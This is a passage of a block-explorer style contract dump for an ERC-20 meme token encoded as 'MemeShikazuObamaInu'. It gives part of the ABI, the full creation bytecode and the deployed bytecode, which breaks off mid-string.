romFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"finalBuyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"finalSellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialTotalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"manualSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"manualSwapWithAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"setTokensToSwapAtAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingOpen","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a0604052620000126009600a62000552565b6200002290633b9aca006200056a565b6009556009600a62000035919062000552565b62000045906302625a006200056a565b600a556009600a62000058919062000552565b62000068906302625a006200056a565b600b55620000796009600a62000552565b6200008890629896806200056a565b600c55600f805461ffff19169055600160108190556011819055601281905560138190556014819055601555348015620000c157600080fd5b506040518060400160405280601381526020017f4d656d655368696b617a754f62616d61496e750000000000000000000000000081525060405180604001604052806008815260200167245348494b415a5560c01b81525081600390816200012a919062000628565b50600462000139828262000628565b50505062000156620001506200021f60201b60201c565b62000223565b737a250d5630b4cf539739df2c5dacb4c659f2488d60808190526200017d90600162000275565b600880546001600160a01b03191633908117909155620001a0905b600162000275565b600780546001600160a01b03191633908117909155620001c2906001620002aa565b620001cf306001620002aa565b620001de61dead6001620002aa565b620001e93362000198565b620001f630600162000275565b6200020561dead600162000275565b62000219306009546200031360201b60201c565b6200070a565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6200027f620003da565b6001600160a01b03919091166000908152601760205260409020805460ff1916911515919091179055565b620002b4620003da565b6001600160a01b038216600081815260166020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6001600160a01b0382166200036f5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b8060026000828254620003839190620006f4565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6005546001600160a01b03163314620004365760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640162000366565b565b505050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620004945781600019048211156200047857620004786200043d565b808516156200048657918102915b93841c939080029062000458565b509250929050565b600082620004ad575060016200054c565b81620004bc575060006200054c565b8160018114620004d55760028114620004e05762000500565b60019150506200054c565b60ff841115620004f457620004f46200043d565b50506001821b6200054c565b5060208310610133831016604e8410600b841016171562000525575081810a6200054c565b62000531838362000453565b80600019048211156200054857620005486200043d565b0290505b92915050565b60006200056360ff8416836200049c565b9392505050565b80820281158282048414176200054c576200054c6200043d565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620005af57607f821691505b602082108103620005d057634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200043857600081815260208120601f850160051c81016020861015620005ff5750805b601f850160051c820191505b8181101562000620578281556001016200060b565b505050505050565b81516001600160401b0381111562000644576200064462000584565b6200065c816200065584546200059a565b84620005d6565b602080601f8311600181146200069457600084156200067b5750858301515b600019600386901b1c1916600185901b17855562000620565b600085815260208120601f198616915b82811015620006c557888601518255948401946001909101908401620006a4565b5085821015620006e45787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b808201808211156200054c576200054c6200043d565b608051611ec96200075e600039600081816103ee01528181610b1401528181610ba501528181610cf101528181610d7601528181610dbc01528181611103015281816111bc01526111f80152611ec96000f3fe6080604052600436106102295760003560e01c80637571336a11610123578063c8c8ebe4116100ab578063e6990a901161006f578063e6990a9014610626578063e6d40d601461063c578063f2fde38b14610652578063f8b45b0514610672578063ffb54a991461068857600080fd5b8063c8c8ebe4146105af578063c9567bf9146105c5578063ca703075146105da578063dd62ed3e146105f0578063e2f456051461061057600080fd5b80639a7a23d6116100f25780639a7a23d61461050f5780639bbad4101461052f578063a457c2d71461054f578063a9059cbb1461056f578063c02466681461058f57600080fd5b80637571336a146104a757806389291a8f146104c75780638da5cb5b146104dc57806395d89b41146104fa57600080fd5b806339509351116101b1578063590f897e11610175578063590f897e146104285780636ddd17131461043e57806370a082311461045d578063715018a61461047d578063751039fc1461049257600080fd5b8063395093511461035857806340b9a54b146103785780634fbee1931461038e57806351bc3c85146103c7578063583e0568146103dc57600080fd5b8063239cd5a5116101f8578063239cd5a5146102c957806323b872dd146102eb578063311028af1461030b578063313ce5671461032157806332424aa31461034357600080fd5b806306fdde0314610235578063095ea7b3146102605780630c6b67371461029057806318160ddd146102b457600080fd5b3661023057005b600080fd5b34801561024157600080fd5b5061024a6106a2565b6040516102579190611b03565b60405180910390f35b34801561026c57600080fd5b5061028061027b366004611b66565b610734565b6040519015158152602001610257565b34801561029c57600080fd5b506102a6600e5481565b604051908152602001610257565b3480156102c057600080fd5b506002546102a6565b3480156102d557600080fd5b506102e96102e4366004611b92565b61074e565b005b3480156102f757600080fd5b50610280610306366004611bab565b610795565b34801561031757600080fd5b506102a660095481565b34801561032d57600080fd5b5060095b60405160ff9091168152602001610257565b34801561034f57600080fd5b50610331600981565b34801561036457600080fd5b50610280610373366004611b66565b6107b9565b34801561038457600080fd5b506102a660125481565b34801561039a57600080fd5b506102806103a9366004611bec565b6001600160a01b031660009081526016602052604090205460ff1690565b3480156103d357600080fd5b506102e96107db565b3480156103e857600080fd5b506104107f000000000000000000000000000000000000000000000000000000000000000081565b6040516001600160a01b039091168152602001610257565b34801561043457600080fd5b506102a660135481565b34801561044a57600080fd5b50600f5461028090610100900460ff1681565b34801561046957600080fd5b506102a6610478366004611bec565b610814565b34801561048957600080fd5b506102e961082f565b34801561049e57600080fd5b506102e9610843565b3480156104b357600080fd5b506102e96104c2366004611c17565b610861565b3480156104d357600080fd5b506102e9610894565b3480156104e857600080fd5b506005546001600160a01b0316610410565b34801561050657600080fd5b5061024a610916565b34801561051b57600080fd5b506102e961052a366004611c17565b610925565b34801561053b57600080fd5b506102e961054a366004611b92565b6109b3565b34801561055b57600080fd5b5061028061056a366004611b66565b6109d3565b34801561057b57600080fd5b5061028061058a366004611b66565b610a4e565b34801561059b57600080fd5b506102e96105aa366004611c17565b610a5c565b3480156105bb57600080fd5b506102a6600a5481565b3480156105d157600080fd5b506102e9610ac3565b3480156105e657600080fd5b506102a6600d5481565b3480156105fc57600080fd5b506102a661060b366004611c50565b610ee7565b34801561061c57600080fd5b506102a6600c5481565b34801561063257600080fd5b506102a660115481565b34801561064857600080fd5b506102a660105481565b34801561065e57600080fd5b506102e961066d366004611bec565b610f12565b34801561067e57600080fd5b506102a6600b5481565b34801561069457600080fd5b50600f546102809060ff1681565b6060600380546106b190611c7e565b80601f01602080910402602001604051908101604052809291908181526020018280546106dd90611c7e565b801561072a5780601f106106ff5761010080835404028352916020019161072a565b820191906000526020600020905b81548152906001019060200180831161070d57829003601f168201915b5050505050905090565b600033610742818585610f88565b60019150505b92915050565b6008546001600160a01b0316336001600160a01b03161461076e57600080fd5b600061077930610814565b90508082111561078857600080fd5b610791826110ac565b5050565b6000336107a3858285611280565b6107ae8585856112fa565b506001949350505050565b6000336107428185856107cc8383610ee7565b6107d69190611cce565b610f88565b6008546001600160a01b0316336001600160a01b0316146107fb57600080fd5b600061080630610814565b9050610811816110ac565b50565b6001600160a01b031660009081526020819052604090205490565b610837611897565b61084160006118f1565b565b61084b611897565b600061085660025490565b600a819055600b5550565b610869611897565b6001600160a01b03919091166000908152601760205260409020805460ff1916911515919091179055565b61089c611897565b600047116108ea5760405162461bcd60e51b81526020600482015260166024820152752a37b5b2b71d1037379022aa24103a379031b632b0b960511b60448201526064015b60405180910390fd5b60405133904780156108fc02916000818181858888f19350505050158015610811573d6000803e3d6000fd5b6060600480546106b190611c7e565b61092d611897565b6006546001600160a01b03908116908316036109a95760405162461bcd60e51b815260206004820152603560248201527f506169722063616e6e6f742062652072656d6f7665642066726f6d206175746f6044820152746d617465644d61726b65744d616b6572506169727360581b60648201526084016108e1565b6107918282611943565b6109bb611897565b6109cd81670de0b6b3a7640000611ce1565b600c5550565b600033816109e18286610ee7565b905083811015610a415760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016108e1565b6107ae8286868403610f88565b6000336107428185856112fa565b610a64611897565b6001600160a01b038216600081815260166020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b610acb611897565b600f5460ff1615610b125760405162461bcd60e51b8152602060048201526011602482015270151c98591a5b99c81a5cc81bdc195b9959607a1b60448201526064016108e1565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b70573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b949190611cf8565b6001600160a01b031663c9c65396307f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610c01573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c259190611cf8565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610c72573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c969190611cf8565b600680546001600160a01b0319166001600160a01b03929092169182179055610cc0906001611943565b600654610cd7906001600160a01b03166001610861565b60065460405163095ea7b360e01b81526001600160a01b037f00000000000000000000000000000000000000000000000000000000000000008116600483015260001960248301529091169063095ea7b3906044016020604051808303816000875af1158015610d4b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d6f9190611d15565b50610d9d307f0000000000000000000000000000000000000000000000000000000000000000600954610f88565b6040516370a0823160e01b815230600482018190526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169163f305d71991479181906370a0823190602401602060405180830381865afa158015610e0d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e319190611d32565b600080610e466005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610eae573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610ed39190611d4b565b5050600f805461ffff191661010117905550565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610f1a611897565b6001600160a01b038116610f7f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016108e1565b610811816118f1565b6001600160a01b038316610fea5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016108e1565b6001600160a01b03821661104b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016108e1565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60408051600280825260608201835260009260208301908036833701905050905030816000815181106110e1576110e1611d79565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561115f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111839190611cf8565b8160018151811061119657611196611d79565b60200260200101906001600160a01b031690816001600160a01b0316815250506111e1307f000000000000000000000000000000000000000000000000000000000000000084610f88565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063791ac9479061124a908590600090869073a669446001ef0c800088b0920359ad37c2d3d79a904290600401611d8f565b600060405180830381600087803b15801561126457600080fd5b505af1158015611278573d6000803e3d6000fd5b505050505050565b600061128c8484610ee7565b905060001981146112f457818110156112e75760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016108e1565b6112f48484848403610f88565b50505050565b6001600160a01b0383166113205760405162461bcd60e51b81526004016108e190611e00565b601454600d5410611332576010546012555b601554600e5410611344576011546013555b8060000361135d5761135883836000611997565b505050565b6005546001600160a01b0384811691161480159061138957506005546001600160a01b03838116911614155b801561139d57506001600160a01b03821615155b80156113b457506001600160a01b03821661dead14155b80156113ca5750600854600160a01b900460ff16155b156116c857600f5460ff1661145d576001600160a01b03831660009081526016602052604090205460ff168061141857506001600160a01b03821660009081526016602052604090205460ff165b61145d5760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b60448201526064016108e1565b6001600160a01b03831660009081526018602052604090205460ff16801561149e57506001600160a01b03821660009081526017602052604090205460ff16155b1561158757600a548111156115135760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b60648201526084016108e1565b600b5461151f83610814565b6115299083611cce565b111561156d5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016108e1565b600d805490600061157d83611e45565b91905055506116c8565b6001600160a01b03821660009081526018602052604090205460ff1680156115c857506001600160a01b03831660009081526017602052604090205460ff16155b1561164e57600a5481111561163e5760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b60648201526084016108e1565b600e805490600061157d83611e45565b6001600160a01b03821660009081526017602052604090205460ff166116c857600b5461167a83610814565b6116849083611cce565b11156116c85760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016108e1565b60006116d330610814565b9050801580159081906116ed5750600f54610100900460ff165b80156117035750600854600160a01b900460ff16155b801561172857506001600160a01b03851660009081526018602052604090205460ff16155b801561174d57506001600160a01b03851660009081526016602052604090205460ff16155b801561177257506001600160a01b03841660009081526016602052604090205460ff16155b156117a1576008805460ff60a01b1916600160a01b17905561179383611abf565b6008805460ff60a01b191690555b6008546001600160a01b03861660009081526016602052604090205460ff600160a01b9092048216159116806117ef57506001600160a01b03851660009081526016602052604090205460ff165b156117f8575060005b60008115611883576001600160a01b03861660009081526018602052604090205460ff161561184857611841606461183b60135488611ae490919063ffffffff16565b90611af7565b9050611865565b611862606461183b60125488611ae490919063ffffffff16565b90505b801561187657611876873083611997565b6118808186611e5e565b94505b61188e878787611997565b50505050505050565b6005546001600160a01b031633146108415760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016108e1565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216600081815260186020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6001600160a01b0383166119bd5760405162461bcd60e51b81526004016108e190611e00565b6001600160a01b03831660009081526020819052604090205481811015806119ed57506001600160a01b03831630145b611a485760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016108e1565b818110611a5757818103611a5a565b60005b6001600160a01b038581166000818152602081815260408083209590955592871680825290849020805487019055925185815290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36112f4565b6000611aca30610814565b9050600081600003611ad95750815b5080611358816110ac565b6000611af08284611ce1565b9392505050565b6000611af08284611e71565b600060208083528351808285015260005b81811015611b3057858101830151858201604001528201611b14565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461081157600080fd5b60008060408385031215611b7957600080fd5b8235611b8481611b51565b946020939093013593505050565b600060208284031215611ba457600080fd5b5035919050565b600080600060608486031215611bc057600080fd5b8335611bcb81611b51565b92506020840135611bdb81611b51565b929592945050506040919091013590565b600060208284031215611bfe57600080fd5b8135611af081611b51565b801515811461081157600080fd5b60008060408385031215611c2a57600080fd5b8235611c3581611b51565b91506020830135611c4581611c09565b809150509250929050565b60008060408385031215611c6357600080fd5b8235611c6e81611b51565b91506020830135611c4581611b51565b600181811c90821680611c9257607f821691505b602082108103611cb257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561074857610748611cb8565b808202811582820484141761074857610748611cb8565b600060208284031215611d0a57600080fd5b8151611af081611b51565b600060208284031215611d2757600080fd5b8151611af081611c09565b600060208284031215611d4457600080fd5b5051919050565b600080600060608486031215611d6057600080fd5b8351925060208401519150604084015190509250925092565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611ddf5784516001600160a01b031683529383019391830191600101611dba565b50506001600160a01b03969096166060850152505050608001529392505050565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b600060018201611e5757611e57611cb8565b5060010190565b8181038181111561074857610748611cb8565b600082611e8e57634e487b7160e01b600052601260045260246000fd5b50049056fea2646970667358221220319d0e2530d5269e22180e26ffd0aaf169ebbb2660dd6ead5dd5c697728bcbfa64736f6c63430008130033

Deployed Bytecode

0x6080604052600436106102295760003560e01c80637571336a11610123578063c8c8ebe4116100ab578063e6990a901161006f578063e6990a9014610626578063e6d40d601461063c578063f2fde38b14610652578063f8b45b0514610672578063ffb54a991461068857600080fd5b8063c8c8ebe4146105af578063c9567bf9146105c5578063ca703075146105da578063dd62ed3e146105f0578063e2f456051461061057600080fd5b80639a7a23d6116100f25780639a7a23d61461050f5780639bbad4101461052f578063a457c2d71461054f578063a9059cbb1461056f578063c02466681461058f57600080fd5b80637571336a146104a757806389291a8f146104c75780638da5cb5b146104dc57806395d89b41146104fa57600080fd5b806339509351116101b1578063590f897e11610175578063590f897e146104285780636ddd17131461043e57806370a082311461045d578063715018a61461047d578063751039fc1461049257600080fd5b8063395093511461035857806340b9a54b146103785780634fbee1931461038e57806351bc3c85146103c7578063583e0568146103dc57600080fd5b8063239cd5a5116101f8578063239cd5a5146102c957806323b872dd146102eb578063311028af1461030b578063313ce5671461032157806332424aa31461034357600080fd5b806306fdde0314610235578063095ea7b3146102605780630c6b67371461029057806318160ddd146102b457600080fd5b3661023057005b600080fd5b34801561024157600080fd5b5061024a6106a2565b6040516102579190611b03565b60405180910390f35b34801561026c57600080fd5b5061028061027b366004611b66565b610734565b6040519015158152602001610257565b34801561029c57600080fd5b506102a6600e5481565b604051908152602001610257565b3480156102c057600080fd5b506002546102a6565b3480156102d557600080fd5b506102e96102e4366004611b92565b61074e565b005b3480156102f757600080fd5b50610280610306366004611bab565b610795565b34801561031757600080fd5b506102a660095481565b34801561032d57600080fd5b5060095b60405160ff9091168152602001610257565b34801561034f57600080fd5b50610331600981565b34801561036457600080fd5b50610280610373366004611b66565b6107b9565b34801561038457600080fd5b506102a660125481565b34801561039a57600080fd5b506102806103a9366004611bec565b6001600160a01b031660009081526016602052604090205460ff1690565b3480156103d357600080fd5b506102e96107db565b3480156103e857600080fd5b506104107f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6040516001600160a01b039091168152602001610257565b34801561043457600080fd5b506102a660135481565b34801561044a57600080fd5b50600f5461028090610100900460ff1681565b34801561046957600080fd5b506102a6610478366004611bec565b610814565b34801561048957600080fd5b506102e961082f565b34801561049e57600080fd5b506102e9610843565b3480156104b357600080fd5b506102e96104c2366004611c17565b610861565b3480156104d357600080fd5b506102e9610894565b3480156104e857600080fd5b506005546001600160a01b0316610410565b34801561050657600080fd5b5061024a610916565b34801561051b57600080fd5b506102e961052a366004611c17565b610925565b34801561053b57600080fd5b506102e961054a366004611b92565b6109b3565b34801561055b57600080fd5b5061028061056a366004611b66565b6109d3565b34801561057b57600080fd5b5061028061058a366004611b66565b610a4e565b34801561059b57600080fd5b506102e96105aa366004611c17565b610a5c565b3480156105bb57600080fd5b506102a6600a5481565b3480156105d157600080fd5b506102e9610ac3565b3480156105e657600080fd5b506102a6600d5481565b3480156105fc57600080fd5b506102a661060b366004611c50565b610ee7565b34801561061c57600080fd5b506102a6600c5481565b34801561063257600080fd5b506102a660115481565b34801561064857600080fd5b506102a660105481565b34801561065e57600080fd5b506102e961066d366004611bec565b610f12565b34801561067e57600080fd5b506102a6600b5481565b34801561069457600080fd5b50600f546102809060ff1681565b6060600380546106b190611c7e565b80601f01602080910402602001604051908101604052809291908181526020018280546106dd90611c7e565b801561072a5780601f106106ff5761010080835404028352916020019161072a565b820191906000526020600020905b81548152906001019060200180831161070d57829003601f168201915b5050505050905090565b600033610742818585610f88565b60019150505b92915050565b6008546001600160a01b0316336001600160a01b03161461076e57600080fd5b600061077930610814565b90508082111561078857600080fd5b610791826110ac565b5050565b6000336107a3858285611280565b6107ae8585856112fa565b506001949350505050565b6000336107428185856107cc8383610ee7565b6107d69190611cce565b610f88565b6008546001600160a01b0316336001600160a01b0316146107fb57600080fd5b600061080630610814565b9050610811816110ac565b50565b6001600160a01b031660009081526020819052604090205490565b610837611897565b61084160006118f1565b565b61084b611897565b600061085660025490565b600a819055600b5550565b610869611897565b6001600160a01b03919091166000908152601760205260409020805460ff1916911515919091179055565b61089c611897565b600047116108ea5760405162461bcd60e51b81526020600482015260166024820152752a37b5b2b71d1037379022aa24103a379031b632b0b960511b60448201526064015b60405180910390fd5b60405133904780156108fc02916000818181858888f19350505050158015610811573d6000803e3d6000fd5b6060600480546106b190611c7e565b61092d611897565b6006546001600160a01b03908116908316036109a95760405162461bcd60e51b815260206004820152603560248201527f506169722063616e6e6f742062652072656d6f7665642066726f6d206175746f6044820152746d617465644d61726b65744d616b6572506169727360581b60648201526084016108e1565b6107918282611943565b6109bb611897565b6109cd81670de0b6b3a7640000611ce1565b600c5550565b600033816109e18286610ee7565b905083811015610a415760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016108e1565b6107ae8286868403610f88565b6000336107428185856112fa565b610a64611897565b6001600160a01b038216600081815260166020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b610acb611897565b600f5460ff1615610b125760405162461bcd60e51b8152602060048201526011602482015270151c98591a5b99c81a5cc81bdc195b9959607a1b60448201526064016108e1565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b70573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b949190611cf8565b6001600160a01b031663c9c65396307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610c01573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c259190611cf8565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610c72573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c969190611cf8565b600680546001600160a01b0319166001600160a01b03929092169182179055610cc0906001611943565b600654610cd7906001600160a01b03166001610861565b60065460405163095ea7b360e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d8116600483015260001960248301529091169063095ea7b3906044016020604051808303816000875af1158015610d4b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d6f9190611d15565b50610d9d307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d600954610f88565b6040516370a0823160e01b815230600482018190526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169163f305d71991479181906370a0823190602401602060405180830381865afa158015610e0d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e319190611d32565b600080610e466005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610eae573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610ed39190611d4b565b5050600f805461ffff191661010117905550565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610f1a611897565b6001600160a01b038116610f7f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016108e1565b610811816118f1565b6001600160a01b038316610fea5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016108e1565b6001600160a01b03821661104b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016108e1565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60408051600280825260608201835260009260208301908036833701905050905030816000815181106110e1576110e1611d79565b60200260200101906001600160a01b031690816001600160a01b0316815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561115f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111839190611cf8565b8160018151811061119657611196611d79565b60200260200101906001600160a01b031690816001600160a01b0316815250506111e1307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d84610f88565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169063791ac9479061124a908590600090869073a669446001ef0c800088b0920359ad37c2d3d79a904290600401611d8f565b600060405180830381600087803b15801561126457600080fd5b505af1158015611278573d6000803e3d6000fd5b505050505050565b600061128c8484610ee7565b905060001981146112f457818110156112e75760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016108e1565b6112f48484848403610f88565b50505050565b6001600160a01b0383166113205760405162461bcd60e51b81526004016108e190611e00565b601454600d5410611332576010546012555b601554600e5410611344576011546013555b8060000361135d57611358838360006